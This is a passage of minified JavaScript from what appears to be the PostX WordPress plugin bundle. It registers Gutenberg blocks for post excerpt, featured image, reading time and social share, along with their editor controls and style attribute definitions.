o=l(67294),a=l(43424),i=l(18715),n=l(39180);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/post_date.svg",alt:"Post Date Meta"}),attributes:i.Z,edit:a.Z,save:()=>null})},25260:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(92637);const{__}=wp.i18n,{InspectorControls:s,useBlockProps:p}=wp.blockEditor,{Fragment:c}=wp.element;function u(e){const{setAttributes:t,name:l,attributes:u,clientId:d,className:m,attributes:{blockId:g,advanceId:y,excerptLimit:b,currentPostId:v}}=e,h={setAttributes:t,name:l,attributes:u,clientId:d};(0,n.S)({blockId:g,clientId:d,currentPostId:v,setAttributes:t,checkRef:!1}),g&&(0,i.Kh)(u,"ultimate-post/post-excerpt",g);const f=p({className:`ultp-block-${g} ${m}`,...y&&{id:y}});let k="Dummy excerpt text sample excerpt text. Dummy excerpt text sample excerpt text.";return b&&(k=k.split(" ").splice(0,b).join(" ")),(0,o.createElement)(c,null,(0,o.createElement)(s,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:"inline",include:[{data:{type:"color",key:"excerptColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"excerptTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",min:0,max:200,key:"excerptLimit",label:__("Excerpt Limit(Word)","ultimate-post")}},{data:{type:"alignment",key:"excerptAlignment",responsive:!0,label:__("Alignment","ultimate-post")}}],store:h})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:h}),(0,o.createElement)(a.Mg,{pro:!0,store:h}),(0,o.createElement)(a.iv,{store:h}))),(0,a.dH)()),(0,o.createElement)("div",f,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-builder-excerpt"},k))))}},11195:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-builder-excerpt {color:{{excerptColor}}}"}]},excerptTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-builder-excerpt"}]},excerptLimit:{type:"string",default:"150"},excerptAlignment:{type:"object",default:[],style:[{selector:"{{ULTP}} .ultp-builder-excerpt {text-align:{{excerptAlignment}}}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},86303:(e,t,l)=>{"use strict";var o=l(67294),a=l(25260),i=l(11195),n=l(34776);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/excerpt.svg"}),attributes:i.Z,edit:a.Z,save:()=>null})},8790:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(92637);const{__}=wp.i18n,{InspectorControls:s,useBlockProps:p}=wp.blockEditor,{Fragment:c}=wp.element;function u(e){const{setAttributes:t,name:l,attributes:u,clientId:d,className:m,attributes:{blockId:g,advanceId:y,altText:b,enableCaption:v,currentPostId:h}}=e,f={setAttributes:t,name:l,attributes:u,clientId:d};(0,n.S)({blockId:g,clientId:d,currentPostId:h,setAttributes:t,checkRef:!1}),g&&(0,i.Kh)(u,"ultimate-post/post-featured-image",g);const k=p({className:`ultp-block-${g} ${m}`,...y&&{id:y}});return(0,o.createElement)(c,null,(0,o.createElement)(s,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"image",title:__("Image","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:0,data:{type:"toggle",key:"defImgShow",help:__("When both an image and a video exist, prioritize displaying the image","ultimate-post"),label:__("Show Image","ultimate-post")}},{position:5,data:{type:"text",key:"altText",label:__("Image ALT text","ultimate-post")}},{position:10,data:{type:"range",key:"imgWidth",min:0,max:1e3,step:1,responsive:!0,unit:!0,label:__("Image Width","ultimate-post")}},{position:12,data:{type:"range",key:"imgHeight",min:0,max:1e3,step:1,responsive:!0,unit:!0,label:__("Image Height","ultimate-post")}},{position:13,data:{type:"group",key:"imgScale",justify:!0,options:[{value:"cover",label:__("Cover","ultimate-post")},{value:"contain",label:__("Container","ultimate-post")},{value:"fill",label:__("Fill","ultimate-post")}],label:__("Image Scale","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:14,data:{type:"range",key:"imgRadius",min:0,max:1e3,step:1,responsive:!0,unit:!0,label:__("Image Border Radius","ultimate-post")}},{position:15,data:{type:"alignment",key:"imgAlign",responsive:!0,label:__("Image Alignment","ultimate-post"),options:["start","center","end"]}},{position:16,data:{type:"select",key:"imgCrop",help:"Image Size Working Only Frontend",label:__("Image Size","ultimate-post"),options:a.gs}},{position:17,data:{type:"toggle",key:"imgSrcset",label:__("Enable Srcset","ultimate-post")}}],store:f}),(0,o.createElement)(a.T,{title:__("Enable Dynamic Caption","ultimate-post"),depend:"enableCaption",include:[{position:1,data:{type:"color",key:"captionColor",label:__("Caption Color","ultimate-post")}},{position:2,data:{type:"color",key:"captionHoverColor",label:__("Caption Hover Color","ultimate-post")}},{position:3,data:{type:"typography",key:"captionTypo",label:__("Caption Typography","ultimate-post")}},{position:4,data:{type:"alignment",key:"captionAlign",disableJustify:!0,label:__("Caption Alignment","ultimate-post")}},{position:5,data:{type:"range",key:"captionSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Caption Space","ultimate-post")}}],store:f})),(0,o.createElement)(r.Section,{slug:"video",title:__("Video","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:__("Video Setting","ultimate-post"),include:[{position:0,data:{type:"range",key:"videoWidth",label:__("Video Width","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:1,data:{type:"range",key:"videoHeight",label:__("Max Video Height","ultimate-post"),min:0,max:1500,step:1,unit:!0,responsive:!0}},{position:2,data:{type:"alignment",key:"vidAlign",disableJustify:!0,label:__("Video Alignment","ultimate-post")}},{position:17,data:{type:"toggle",key:"enableVideoCaption",label:__("Video Caption Enable","ultimate-post")}},{position:3,data:{type:"toggle",key:"stickyEnable",pro:!0,label:__("On Scroll Sticky Enable","ultimate-post")}},{position:4,data:{type:"range",key:"stickyWidth",label:__("Sticky Video Width","ultimate-post"),min:0,max:1500,step:1,responsive:!0}},{position:6,data:{type:"select",key:"stickyPosition",options:[{label:"Bottom Right",value:"bottomRight"},{label:"Bottom Left",value:"bottomLeft"},{label:"Top Right",value:"topRight"},{label:"Top Left",value:"topLeft"}],label:__("Sticky Video Position","ultimate-post")}},{position:7,data:{type:"range",key:"flexiblePosition",label:__("Flexible Sticky Position","ultimate-post"),min:0,max:500,step:1,unit:!0,responsive:!0}},{position:8,data:{type:"color",key:"stickyBg",label:__("Background","ultimate-post")}},{position:9,data:{type:"border",key:"stickyBorder",label:__("Border","ultimate-post")}},{position:10,data:{type:"boxshadow",key:"stickyBoxShadow",label:__("BoxShadow","ultimate-post")}},{position:12,data:{type:"dimension",key:"stickyPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:13,data:{type:"separator",label:__("Close Button Style","ultimate-post")}},{position:14,data:{type:"range",key:"stickyCloseSize",label:__("Sticky Close Size","ultimate-post")}},{position:15,data:{type:"color",key:"stickyCloseColor",label:__("Sticky Close Color","ultimate-post")}},{position:16,data:{type:"color",key:"stickyCloseBg",label:__("Close Background Color","ultimate-post")}}],store:f})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:f}),(0,o.createElement)(a.Mg,{pro:!0,store:f}),(0,o.createElement)(a.iv,{store:f}))),(0,a.dH)()),(0,o.createElement)("div",k,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-image-wrapper"},(0,o.createElement)("div",{className:"ultp-builder-image"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg",alt:b||"Image"}))),v&&(0,o.createElement)("div",{className:"ultp-featureImg-caption"},"Dynamic Image Caption"))))}},10577:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},defImgShow:{type:"boolean",default:!1},altText:{type:"string",default:"Image"},imgWidth:{type:"object",default:{lg:"",ulg:"px",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-wrapper .ultp-builder-image { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",ulg:"px",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-wrapper .ultp-builder-image img {height: {{imgHeight}}; }"}]},imgRadius:{type:"object",default:{lg:"",ulg:"px",unit:"px"},style:[{selector:"{{ULTP}} .ultp-builder-image img { border-radius:{{imgRadius}}; }"}]},imgScale:{type:"string",default:"cover",style:[{depends:[{key:"imgScale",condition:"==",value:"cover"}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-builder-image img { object-fit: cover }"},{depends:[{key:"imgScale",condition:"==",value:"contain"}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-builder-image img { object-fit: contain }"},{depends:[{key:"imgScale",condition:"==",value:"fill"}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-builder-image img { object-fit: fill }"}]},imageScale:{type:"string",default:"cover",style:[{selector:"{{ULTP}} .ultp-builder-video {object-fit: {{imageScale}};}"}]},imgAlign:{type:"object",default:{lg:"left"},style:[{selector:"{{ULTP}} .ultp-image-wrapper:has(.ultp-builder-image) {display: flex; justify-content:{{imgAlign}}; text-align: {{imgAlign}}; } "}]},imgCrop:{type:"string",default:"full"},imgSrcset:{type:"boolean",default:!1},enableCaption:{type:"boolean",default:!1},captionColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-featureImg-caption { color: {{captionColor}}; }"}]},captionHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-featureImg-caption:hover { color: {{captionHoverColor}}; } "}]},captionTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-featureImg-caption"}]},captionAlign:{type:"string",default:"center",style:[{selector:"{{ULTP}} .ultp-featureImg-caption { text-align:{{captionAlign}} }"}]},captionSpace:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-featureImg-caption { margin-top:{{captionSpace}}; }"}]},enableVideoCaption:{type:"boolean",default:!1},videoWidth:{type:"object",default:{lg:"100"},style:[{selector:"{{ULTP}} .ultp-builder-video:has( video ), {{ULTP}} .ultp-embaded-video {width:{{videoWidth}}%;}"}]},videoHeight:{type:"object",default:{lg:"",ulg:"px",unit:"px"},style:[{selector:"{{ULTP}} .ultp-builder-video video, {{ULTP}} .ultp-builder-video .ultp-embaded-video {max-height:{{videoHeight}}; height: 100%;}"}]},vidAlign:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-image-wrapper:has( .ultp-embaded-video ) { text-align:{{vidAlign}}; } {{ULTP}} .ultp-image-wrapper:has( .ultp-video-html ) {  display: flex; justify-content:{{vidAlign}}; }"}]},stickyEnable:{type:"boolean",default:!1},stickyWidth:{type:"object",default:{lg:"450"},style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active {width:{{stickyWidth}}px !important;}"}]},stickyPosition:{type:"string",default:"bottomRight",style:[{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"bottomRight"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { bottom: 0px; right: 20px; }"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"bottomLeft"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { bottom: 0px; left: 20px; }"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"topRight"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { top: 0px; right: 20px;; }"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"topLeft"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { top: 0px; left: 20px; }"}]},flexiblePosition:{type:"object",default:{lg:"15",ulg:"px",unit:"px"},style:[{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"bottomRight"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { bottom:{{flexiblePosition}}!important;}"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active {display: flex; justify-content: center; align-items: center;}"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"bottomLeft"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { bottom:{{flexiblePosition}} !important;}"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"topRight"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { top:{{flexiblePosition}} !important;}"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"topLeft"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { top:{{flexiblePosition}}!important;}"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"rightMiddle"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { display: flex; justify-content: flex-end; align-items: center;}"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"leftMiddle"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { display: flex; justify-content: flex-start; align-items: center; }"}]},stickyBg:{type:"string",default:"#000",style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { background:{{stickyBg}} }"}]},stickyBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active"}]},stickyBoxShadow:{type:"object",default:{openShadow:1,width:{top:0,right:0,bottom:24,left:1},color:"#000000e6"},style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active"}]},stickyRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { border-radius:{{stickyRadius}}; }"}]},stickyPadding:{type:"object",default:{lg:{}},style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { padding:{{stickyPadding}} !important; }"}]},stickyCloseSize:{type:"string",default:"47",style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active .ultp-sticky-close { height:{{stickyCloseSize}}px; width:{{stickyCloseSize}}px; } {{ULTP}} .ultp-sticky-video.ultp-sticky-active .ultp-sticky-close::after { font-size: calc({{stickyCloseSize}}px / 2);}"}]},stickyCloseColor:{type:"string",default:"#fff",style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active .ultp-sticky-close { color:{{stickyCloseColor}} }"}]},stickyCloseBg:{type:"string",default:" rgb(43, 43, 43)",style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-close { background-color:{{stickyCloseBg}} }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},28913:(e,t,l)=>{"use strict";var o=l(67294),a=l(8790),i=l(10577),n=l(96283);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/featured_img.svg",alt:"Post Feature Image"}),attributes:i.Z,edit:a.Z,save:()=>null})},45454:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(64766),i=l(53049),n=l(99838),r=l(92637),s=l(54324);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element;function d(e){const{setAttributes:t,name:l,attributes:d,clientId:m,className:g,attributes:{blockId:y,advanceId:b,readLabelText:v,readIconStyle:h,readLabel:f,readIconShow:k,currentPostId:w}}=e,x={setAttributes:t,name:l,attributes:d,clientId:m};(0,s.S)({blockId:y,clientId:m,currentPostId:w,setAttributes:t,checkRef:!1}),y&&(0,n.Kh)(d,"ultimate-post/post-reading-time",y);const T=c({className:`ultp-block-${y} ${g}`,...b&&{id:b}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(i.T,{title:"inline",include:[{data:{type:"toggle",key:"readLabel",label:__("Enable Label","ultimate-post")}},{data:{type:"color",key:"readColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"readTypo",label:__("Typography","ultimate-post")}},{data:{type:"alignment",key:"readCountAlign",disableJustify:!0,responsive:!0,label:__("Alignment","ultimate-post")}},{data:{type:"text",key:"readLabelText",label:__("Text","ultimate-post")}},{data:{type:"group",key:"readLabelAlign",options:[{label:"After Content",value:"after"},{label:"Before Content",value:"before"}],justify:!0,label:__("Prefix Position","ultimate-post")}}],store:x}),(0,o.createElement)(i.T,{title:__("Icon Style","ultimate-post"),depend:"readIconShow",initialOpen:!0,include:[{data:{type:"color",key:"iconColor",label:__("Color","ultimate-post")}},{data:{type:"icon",key:"readIconStyle",label:__("Style","ultimate-post")}},{data:{type:"range",key:"readIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Size","ultimate-post")}},{data:{type:"range",key:"readSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Space X","ultimate-post")}}],store:x})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(i.yB,{store:x}),(0,o.createElement)(i.Mg,{pro:!0,store:x}),(0,o.createElement)(i.iv,{store:x}))),(0,i.dH)()),(0,o.createElement)("div",T,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("span",{className:"ultp-read-count"},k&&h&&a.ZP[h],(0,o.createElement)("div",null,"12"),f&&(0,o.createElement)("span",{className:"ultp-read-label"},v)))))}},62698:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},readLabel:{type:"boolean",default:!0},readIconShow:{type:"boolean",default:!0},readColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-read-count { color:{{readColor}} }"}]},readTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-read-count"}]},readCountAlign:{type:"object",default:[],style:[{selector:"{{ULTP}} .ultp-block-wrapper { text-align: {{readCountAlign}};}"}]},readLabelText:{type:"string",default:"Reading Time",style:[{depends:[{key:"readLabel",condition:"==",value:!0}]}]},readLabelAlign:{type:"string",default:"after",style:[{depends:[{key:"readLabelAlign",condition:"==",value:"before"},{key:"readLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-read-count .ultp-read-label {order: -1; margin-right: 5px;}"},{depends:[{key:"readLabelAlign",condition:"==",value:"after"},{key:"readLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-read-count .ultp-read-label {order: unset; margin-left: 5px;}"}]},iconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"readIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-read-count > svg { color:{{iconColor}}; color:{{iconColor}};}"}]},readIconStyle:{type:"string",default:"readingTime1",style:[{depends:[{key:"readIconShow",condition:"==",value:!0}]}]},readIconSize:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"readIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-read-count svg{ width:{{readIconSize}}; height:{{readIconSize}} }"}]},readSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"readIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-read-count > svg { margin-right: {{readSpace}} }"},{depends:[{key:"readIconShow",condition:"==",value:!0},{key:"readLabelAlign",condition:"==",value:"before"}],selector:"{{ULTP}} .ultp-read-count > svg { margin: {{readSpace}} } {{ULTP}}  .ultp-read-count .ultp-read-label {margin: 0px !important;}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},64255:(e,t,l)=>{"use strict";var o=l(67294),a=l(45454),i=l(62698),n=l(46693);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/reading_time.svg",alt:"Post Reading Time"}),attributes:i.Z,edit:a.Z,save:()=>null})},50730:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(64766),s=l(45092);const{__}=wp.i18n,{Fragment:p}=wp.element,{InspectorControls:c,useBlockProps:u}=wp.blockEditor;function d(e){const{setAttributes:t,name:l,attributes:d,clientId:m,className:g,attributes:{blockId:y,advanceId:b,disInline:v,shareLabelShow:h,shareCountLabel:f,shareCountShow:k,repetableField:w,shareLabelStyle:x,currentPostId:T}}=e,_={setAttributes:t,name:l,attributes:d,clientId:m};(0,n.S)({blockId:y,clientId:m,currentPostId:T,setAttributes:t,checkRef:!1}),y&&(0,i.Kh)(d,"ultimate-post/post-social-share",y);const C=u({className:`ultp-block-${y} ${g}`,...b&&{id:b}});return(0,o.createElement)(p,null,(0,o.createElement)(c,null,(0,o.createElement)(s.Z,{store:_}),(0,a.dH)()),(0,o.createElement)("div",C,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-post-share"},(0,o.createElement)("div",{className:`ultp-post-share-layout ultp-inline-${v}`},h&&(0,o.createElement)("div",{className:"ultp-post-share-count-section ultp-post-share-count-section-"+x},"style2"!=x&&k&&(0,o.createElement)("span",{className:"ultp-post-share-count"},"350"),"style2"==x&&(0,o.createElement)("span",{className:"ultp-post-share-icon-section"},r.ZP.share),"style2"!=x&&f&&(0,o.createElement)("span",{className:"ultp-post-share-label"},f)),(0,o.createElement)("div",{className:"ultp-post-share-item-inner-block"},w.map(((e,t)=>(0,o.createElement)("div",{key:t,className:`ultp-post-share-item ultp-repeat-${t} ultp-social-${e.type}`},(0,o.createElement)("a",{href:"#",className:`ultp-post-share-item-${e.type}`},(0,o.createElement)("span",{className:"ultp-post-share-item-icon"},r.ZP[e.type]),e.enableLabel&&(0,o.createElement)("span",{className:"ultp-post-share-item-label"},e.label)))))))))))}},45092:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Setting","ultimate-post")},(0,o.createElement)(a.T,{title:__("General","ultimate-post"),store:e,initialOpen:!0,include:[{position:1,data:{type:"repetable",key:"repetableField",label:__("Social Share Style","ultimate-post"),fields:[{type:"select",key:"type",label:__("Social Media","ultimate-post"),options:[{value:"facebook",label:__("Facebook","ultimate-post")},{value:"twitter",label:__("Twitter","ultimate-post")},{value:"messenger",label:__("Messenger","ultimate-post")},{value:"linkedin",label:__("Linkedin","ultimate-post")},{value:"reddit",label:__("Reddit","ultimate-post")},{value:"mail",label:__("Mail","ultimate-post")},{value:"whatsapp",label:__("WhatsApp","ultimate-post")},{value:"skype",label:__("Skype","ultimate-post")},{value:"pinterest",label:__("Pinterest","ultimate-post")}]},{type:"toggle",key:"enableLabel",label:__("Label Enable","ultimate-post")},{type:"text",key:"label",label:__("Label","ultimate-post")},{type:"color",key:"iconColor",label:__("Color","ultimate-post")},{type:"color",key:"iconColorHover",label:__("Color Hover","ultimate-post")},{type:"color",key:"shareBg",label:__("Background","ultimate-post")},{type:"color",key:"shareBgHover",label:__("Hover Background","ultimate-post")}]}},{position:2,data:{type:"separator",label:__("Common Style","ultimate-post")}},{position:2,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"shareColor",label:__("Color","ultimate-post")},{type:"color",key:"shareCommonBg",label:__("Background","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"shareHoverColor",label:__("Hover Color","ultimate-post")},{type:"color",key:"shareHoverBg",label:__("Hover Background","ultimate-post")}]}]}},{position:3,data:{type:"typography",key:"shareItemTypo",label:__("Typography","ultimate-post")}}]}),(0,o.createElement)(a.T,{title:__("Item Setting","ultimate-post"),include:[{data:{type:"toggle",key:"disInline",label:__("Item Inline","ultimate-post")}},{data:{type:"range",key:"shareIconSize",min:0,max:150,unit:!1,responsive:!0,step:1,label:__("Icon Size","ultimate-post")}},{data:{type:"border",key:"shareBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"shareRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"itemPadding",min:0,max:80,step:1,unit:!0,responsive:!0,label:__("Item Padding","ultimate-post")}},{data:{type:"dimension",key:"itemSpacing",min:0,max:80,step:1,unit:!0,responsive:!0,label:__("Spacing","ultimate-post")}},{data:{type:"group",key:"itemContentAlign",options:[{label:"Left",value:"flex-start"},{label:"Center",value:"center"},{label:"Right",value:"flex-end"}],justify:!0,label:__("Content Alignment","ultimate-post")}},{data:{type:"alignment",key:"itemAlign",responsive:!1,label:__("Alignment","ultimate-post"),disableJustify:!0}}],store:e}),(0,o.createElement)(a.T,{title:__("Share Label & Count","ultimate-post"),include:[{data:{type:"toggle",key:"shareLabelShow",label:__("Show Share label & Count","ultimate-post")}},{data:{type:"select",key:"shareLabelStyle",label:__("Share Label Style","ultimate-post"),options:[{value:"style1",label:__("Style 1","ultimate-post")},{value:"style2",label:__("Style 2","ultimate-post")},{value:"style3",label:__("Style 3","ultimate-post")},{value:"style4",label:__("Style 4","ultimate-post")}]}},{data:{type:"range",key:"labelIconSize",min:0,max:100,unit:!1,responsive:!0,step:1,label:__("Label Icon Size","ultimate-post")}},{data:{type:"dimension",key:"labelIconSpace",label:__("Space","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"color",key:"shareLabelIconColor",label:__("Icon Color","ultimate-post")}},{data:{type:"color",key:"Labels1BorderColor",label:__("Border Color","ultimate-post")}},{data:{type:"color",key:"shareLabelBackground",label:__("Background Color","ultimate-post")}},{data:{type:"border",key:"shareLabelBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"shareLabelRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"shareLabelPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"toggle",key:"shareCountShow",label:__("Share Count","ultimate-post")}},{data:{type:"color",key:"shareCountColor",label:__("Count Color","ultimate-post")}},{data:{type:"typography",key:"shareCountTypo",label:__("Count Typography","ultimate-post")}},{data:{type:"text",key:"shareCountLabel",label:__("Share Count Label","ultimate-post")}},{data:{type:"color",key:"shareLabelColor",label:__("Label Color","ultimate-post")}},{data:{type:"typography",key:"shareLabelTypo",label:__("Label Typography","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Sticky Position","ultimate-post"),depend:"enableSticky",include:[{data:{type:"select",key:"itemPosition",label:__("Display Style","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("right","ultimate-post")},{value:"bottom",label:__("bottom","ultimate-post")}]}},{data:{type:"range",key:"stickyLeftOffset",min:0,max:1500,unit:!1,responsive:!1,step:1,label:__("Left Offset","ultimate-post")}},{data:{type:"range",key:"stickyRightOffset",min:0,max:1500,unit:!1,responsive:!1,step:1,label:__("Right Offset","ultimate-post")}},{data:{type:"range",key:"stickyTopOffset",min:0,max:1500,unit:!1,responsive:!1,step:1,label:__("Top Offset","ultimate-post")}},{data:{type:"range",key:"stickyBottomOffset",min:0,max:1500,unit:!1,responsive:!1,step:1,label:__("Bottom Offset","ultimate-post")}},{data:{type:"toggle",key:"resStickyPost",label:__("Disable Sticky ( Responsive )","ultimate-post")}},{data:{type:"range",key:"floatingResponsive",min:0,max:1200,unit:!1,responsive:!1,step:1,label:__("Horizontal floating responsiveness","ultimate-post")}},{data:{type:"toggle",key:"stopSticky",label:__("Disable Sticky ( when footer is visible )","ultimate-post")}}],store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:e}),(0,o.createElement)(a.Mg,{pro:!0,store:e}),(0,o.createElement)(a.iv,{store:e})))},69977:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const 